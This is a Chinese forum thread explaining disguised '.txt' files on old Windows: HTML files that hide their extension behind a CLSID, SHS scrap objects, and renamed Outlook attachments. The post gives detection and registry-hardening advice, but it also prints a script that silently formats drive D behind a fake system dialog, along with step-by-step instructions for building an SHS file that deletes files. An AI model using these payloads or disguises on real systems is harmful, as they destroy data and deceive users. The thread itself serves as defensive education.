每个凉宫都会遇到属于她的John Smith。 收藏本站
登陆 / 注册 搜索

阅读: 23.8K   回复: 9

[# 系统基础] 三种可怕的TXT文件

[复制链接]
小执念 古黑浩劫论坛大牛 2015-12-2 22:52 |显示全部楼层

可遇不可求的事:故乡的云,上古的玉,随手的诗,十九岁的你。

管理员 五周年纪念
  一. 隐藏HTML扩展名的TXT文件$ T8 `: g# S' }& x3 U2 C1 ?

, s  c0 K5 t! g6 `  假如你收到的邮件附件中有一个看起来是这样的文件:QQ靓号放送.txt,你是不是认为它肯定是纯文本文件?我要告诉你,不一定!它的实际文件名可以是QQ靓号放送.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}。{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}在注册表里是HTML文件关联的意思。但是存成文件名的时候它并不会显现出来,你看到的就是个.txt文件,这个文件实际上等同于QQ靓号放送.txt.html。那么直接打开这个文件为什么有危险呢?请看如果这个文件的内容如下:
" O! ^! W3 X$ Z' `% M2 q+ e  x+ L[mw_shl_code=javascript,true]  <script>& D) F$ o# }- ?4 Y* w2 C6 F
  a=new ActiveXObject("WSCript.Shell");6 A* g1 W" |% h
  a.run("format.com d:/q /autotest /u");
! l' k: t' d$ g2 Y+ i/ e  alert("Windows is configuring the system. Please do not interrupt this process.");1 a9 _) {. g: U
  </script> [/mw_shl_code]0 s  o) t: `& }/ h
  你可能以为它会调用记事本来运行,可是如果你双击它,结果它却调用了HTML来运行,并且自动在后台开始格式化D盘,同时显示“Windows is configuring the system。Plase do not interrupt this process。”这样一个对话框来欺骗你。你看随意打开附件中的.txt的危险够大了吧?9 c" o) X8 ~' @9 `7 s3 K+ ^% d
7 ~3 D( H- N7 l* n- w
  欺骗实现原理:当你双击这个伪装起来的.txt时候,由于真正文件扩展名是.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B},也就是.html文件,于是就会以html文件的形式运行,这是它能运行起来的先决条件。5 k) H6 L  G* n& W6 `6 R; ]! Z0 m
# u$ l$ Y) h# t6 O: u6 P- @  a
  文件内容中的第2和第3行是它能够产生破坏作用的关键所在。其中第3行是破坏行动的执行者,在其中可以加载带有破坏性质的命令。那么第2行又是干什么的呢?你可能已经注意到了第2行里的“WSCript”,对!就是它导演了全幕,它是幕后主谋!
% v; a/ w- v9 E* e$ s
" O3 F. ~- Z. Z. z4 a3 O: }, E* q  WScript全称Windows Scripting Host,它是Win98中新加进的功能,是一种批次语言/自动执行工具——它所对应的程序“WScript.exe”是一个脚本语言解释器,位于c:\WINDOWS下,正是它使得脚本可以被执行,就象执行批处理一样。在Windows Scripting Host脚本环境里,预定义了一些对象,通过它自带的几个内置对象,可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能。# p" @# Z! d* E/ m. ?: i

, r) f& y- b1 a. B% z  C4 L  识别及防范方法:4 @* e2 a  W* e( k6 X! m6 @7 q! x2 I
8 i3 e" w! v  p' M! u/ w) L
  ①这种带有欺骗性质的.txt文件显示出来的并不是文本文件的图标,它显示的是未定义文件类型的标志,这是区分它与正常TXT文件的最好方法。
0 Z; ?/ t( w$ x' w7 s$ ^  ②识别的另一个办法是在“按WEB页方式”查看时在“我的电脑”左面会显示出其文件名全称(如图1),此时可以看到它不是真正的TXT文件。问题是很多初学者经验不够,老手也可能因为没留意而打开它,在这里再次提醒你,注意你收到的邮件中附件的文件名,不仅要看显示出来的扩展名,还要注意其实际显示的图标是什么。9 J- f" I+ O6 l
  ③对于附件中别人发来的看起来是TXT的文件,可以将它下载后用鼠标右键选择“用记事本打开”,这样看会很安全。% G) G' v8 n" o* |, A7 a) A
$ m( {5 j6 F( k2 Y& U
  二. 恶意碎片文件
) W4 @( ^- e* D: B% m; K" j9 ]
  另一类可怕的TXT文件是一种在Windows中被称作“碎片对象”(扩展名为“SHS”)的文件,它一般被伪装成文本文件通过电子邮件附件来传播,比方说,这个样子:QQ号码放送.txt.shs,由于真正地后缀名“SHS”不会显示出来,如果在该文件中含有诸如“format”之类的命令将非常可怕!不仅如此,以下四点原因也是其有一定危害性的原因:3 r1 s- W* v; u$ Y* d" a0 E

, m8 k9 o5 H( e/ s* l  ①碎片对象文件的缺省图标是一个和记事本文件图标相类似的图标,很容易会被误认为是一些文本的文档,用户对它的警惕心理准备不足。
) R+ i; g& v& N4 E  ②在Windows的默认状态下,“碎片对象”文件的扩展名(“.SHS”)是隐藏的,即使你在“资源管理器”→“工具”→“文件夹选项”→“查看”中,把“隐藏已知文件类型的扩展名”前面的“√”去掉,“.SHS”也还是隐藏的,这是因为Windows支持双重扩展名,如“QQ号码放送.txt.shs”显示出来的名称永远是“QQ号码放送.txt”。& H7 d+ g$ K: f% G" o  y# O
  ③即使有疑心,你用任何杀毒软件都不会找到这个文件的一点问题,因为这个文件本身就没有病毒,也不是可执行的,而且还是系统文件。你会怀疑这样的文件吗?
7 v: e3 q! E: {3 ~3 t( x5 h  ④这种SHS附件病毒制造起来非常容易,5分钟就可以学会,也不需要编程知识(格式化C盘的命令:“Format c:”大家都知道吧^_^)。
8 \1 M& a- V( X8 i' p
5 p( h& D' W# V  1. 具体实例
% T' C4 r$ @6 S2 b$ Q( x( ?8 |$ O' ^( `0 l+ q, p& h$ }
  那么,碎片对象到底对用户的计算机会造成什么威胁呢?我们一起来作个测试就明白了。以下测试环境是在Windows 2000 server中文版上进行的。我们先在硬盘上创建一个测试用的文件test.txt(我创建的位置是D:\test.txt),然后我们来制作一个能删除这个测试文件的碎片对象文件。6 `: E! Q, s7 @
  " |# m/ v1 D: W  E
  ①先运行一个对象包装程序(packager.exe),我的Win2000 server安装在/winnt/system32下。* v4 Z% T  f: A# J
  ②新建一个文件后,打开菜单“文件”→“导入”,这时会弹出一个文件对话框,让你选择一个文件。不用考虑,随便选择一个文件就可以了。, F- o" x8 j# u- v1 t
  ③然后打开“编辑”→“命令行”,在弹出的命令行输入对话框中输入“cmd.exe /c del d:\test.txt”,点“确定”。) J2 m3 F: q) F- V7 j7 l4 G" N
  ④然后,在菜单中选择“编辑”→“复制数据包”。6 e. U! P- R( M
  ⑤接着,随便在硬盘上找个地方,我就直接在桌面上了。在桌面上点击鼠标右键,在弹出菜单中选择“粘贴”,这时我们可以看到在桌面创建了一个碎片对象文件。  j/ ]+ l& m% b7 p* V
7 S. o6 l2 p8 [" n) R! H" E
  现在我们可以双击一下这个文件,CMD窗口一闪而过后,再到D盘看看,测试文件D:\test.txt已经被删除了!现在你该知道了,当时在对象包装中输入地命令被执行了。好危险啊,如果这条命令是要删除系统中的一个重要文件,或者是格式化命令format之类的危险命令,那该有多么的可怕!
+ u. w7 b6 n! X1 T& E2 z  下面让我们一起来看看这个“隐身杀手”的真正面目吧!& ]# u; I2 m- f1 Z3 ^6 W
! \6 [7 Z8 ~( r/ j/ U% q- ]  `3 i
  2. 技术原理
. H( t8 E7 l  ?
: U+ q7 X; o& a) \0 }  依照微软的解释,SHS文件是一类特殊的OLE(Object Linking and Embedding,对象连接和嵌入)对象,可以由Word文档或Excel电子表格创建。通过选择文档中文本或图像的一块区域,然后拖放该区域到桌面上的某处,就可以创建一个Windows碎片对象,或称为SHS文件(此文件是不可读文件)。但是你可以用任何其它你想要的文件名重新命名SHS文件,或者拖放SHS对象到另一个文档(同样地,你可以剪切和粘贴)。: v" J+ Z) L5 a
% i/ M$ v+ @  k5 Z0 {8 P
  也就是说,我们所输入的命令作为OLE对象嵌入到对象包装程序新建的文件中了,而微软为了能方便的将嵌入到文件的对象进行复制,使用了一种技术Shell Scrap Object(简称SHS),就是说,当你在不同文件间复制对象时,Windows是将对象包装成一个碎片对象来进行复制的。因此,一旦我们不是在文件间进行复制粘贴,而是直接将碎片对象粘贴到硬盘上,就会产生一个.SHS文件。这个碎片对象文件保存了原来对象的所具备的功能,原来对象包含的命令同样会被解析执行,这正是其可怕这处!( ?9 b( Q; I- V. Y) l

* l$ S( _6 t* K  3. 防范方法! X( |( J  w& a& P/ M

# d: H9 [8 E0 C* A) `+ ?7 P  (1)“野蛮”法
0 H0 }# L0 L: }; Q& W  SHS文件既然不是可执行文件,当然需要其他的程序来解析执行了,我们去掉解析执行的关联就可以简单防止这种文件中潜伏的威胁了。 运行注册表编辑器regedit.exe,在HKEY_CLASSES_ROOT\.shs主键下,将默认值ShellScrap删除,现在双击.SHS文件,看,不会执行了吧?弹出了一个对话框,让我们选择打开.SHS文件需要的程序,此时你选择“记事本”程序看就非常安全了。 更彻底一点的办法是将HKEY_CLASSES_ROOT\ShellScrap\shell\open\command下的打开.SHS文件的关联完全去掉,现在双击.SHS文件,连选择运行程序的对话框也不出现了,它会直接要求在控制面板重建文件关联。; }- ]) j- [& k0 l4 s% r* Z+ @+ e

% f0 T* Y9 y1 S& [+ V  (2)“文明”法) k! J8 \& a0 r. F! S( ^

3 a6 B7 }  C4 x4 D4 ^, F  ①在注册表编辑器HEY_CLASSES_ROOT\ShellScrap键下,有一个键值“NeverShowExt”,它是导致“.SHS”文件扩展名无法显示的罪魁祸首。删除这个键值,你就可以看到“.SHS”扩展名了。
. V. Z4 Q9 O. {% L9 [3 {5 G  ②更换“碎片对象”文件的默认图标。由于碎片对象文件的默认图标与文本文件图标非常相似,容易麻痹人,所以我们要更换它的图标。打开资源管理器,选中“查看”菜单下的“文件夹选框”,在弹出的对话框中选择“文件类型”标签,在“已注册的文件类型”下找到“碎片对象”。单击右上角“编辑”按钮,在打开的“编辑文件类型”对话框中单击上边的“更改图标”按钮。打开C:\WINDOWS\SYSTEM\Pifmgr.dll,从出现的图标中选一个作为“.SHS”文件的新图标即可。
1 c. ^/ W; l" n9 i3 l1 M( \' ?! {6 e) m8 c' C( @) Q. D$ N
  (3)更多防治手段4 Z  j/ Z; W. T# z/ J

5 \4 K# ~2 t8 r; d! J4 Y  ①如果是病毒文件隐藏了其真实扩展名“SHS”,而你在反病毒软件中设置成扫描指定程序文件、而不是扫描所有文件(如只扫描可执行文件),那么反病毒软件是无法发现病毒的,所以请在反病毒软件的指定程序文件中加入“.SHS”文件的扫描。各种防病毒软件的设置大同小异,比较简单,请大家自己进行设置。+ [: i, g8 f. l2 ]% O  F( S8 U
& P. y/ V9 d" e/ ~/ ]  R
  ②禁止“碎片对象”文件及“指向文档的快捷方式”文件。
/ O" \, E6 }8 G  V6 A, S5 q2 i" I
- i( e1 U0 d1 @% k/ R  三.改头换面的OutLook邮件附件
0 \7 Y2 r1 c% Z" i" [6 P, K
' n5 @3 I) c5 Y8 `7 S+ t  除了上面所说的两类危险的“TXT”文件,还存在另一种危险的“TXT”文件——改头换面的OutLook邮件附件!即一个看起来是TXT的文件其实是个EXE文件!
上一篇
下一篇
帖子热度 2.4万 ℃
小执念认真回帖,奖励 1 个 金币.

卡尔 「初入古黑」 2016-5-12 21:00 |显示全部楼层

这个用户很懒,还没有填写自我介绍呢~

我在我的电脑(华硕V555L,WIN10 64位系统)下载了packager.exe(兼容win10 64位系统),将其移动到C盘System32文件夹后打开却提示“应用程序无法正常启动(0xc0000142)”,在网上也没找到什么实质性的帮助,还望楼主指导一下,我该怎样才能让packager.exe在我的电脑上正常运行,麻烦了{:4_107:}
卡尔发帖时在路边捡到 2 个 金币,偷偷放进了口袋.
Gongyuan 「初入古黑」 2016-5-26 15:08 |显示全部楼层

这个用户很懒,还没有填写自我介绍呢~

一直以来都以为只要显示扩展名就能区分文件。。。长见识了
小小刚521 「初入古黑」 2016-7-11 17:38 |显示全部楼层

这个用户很懒,还没有填写自我介绍呢~

我的电脑 好像没有  对象包装程序ai。。。。。。
清风霁月 「出类拔萃」 2017-9-21 08:09 来自手机 |显示全部楼层

这个用户很懒,还没有填写自我介绍呢~

让人根据它写成小说又被不同导演拍成48个不同版本的电影的好帖 * I% ^/ F! G  _. N" E
微雨黄昏 「出类拔萃」 2018-5-3 13:56 来自手机 |显示全部楼层

这个用户很懒,还没有填写自我介绍呢~

#j345:一直在看
映画 「出类拔萃」 2018-5-8 08:24 来自手机 |显示全部楼层

这个用户很懒,还没有填写自我介绍呢~

楼主,我现在有些冷静下来了,我觉得应该做一些实际的事情。我决定先把你的名字纪录下来。让子孙后代牢记于心,广为传诵。让他们知道什么是中国的传统美德,什么是炎黄子孙的精神,什么是黄河水,什么是长江魂。什么是五千年的文明史.
水月 「出类拔萃」 2019-1-19 11:45 |显示全部楼层

这个用户很懒,还没有填写自我介绍呢~

感谢楼主~
teditor 「初入古黑」 2019-1-23 13:30 |显示全部楼层

这个用户很懒,还没有填写自我介绍呢~

厉害了,以前以为只要区分扩展名就行了
您需要登录后才可以回帖 登录 | 免费注册  

本版积分规则

快速回复 返回列表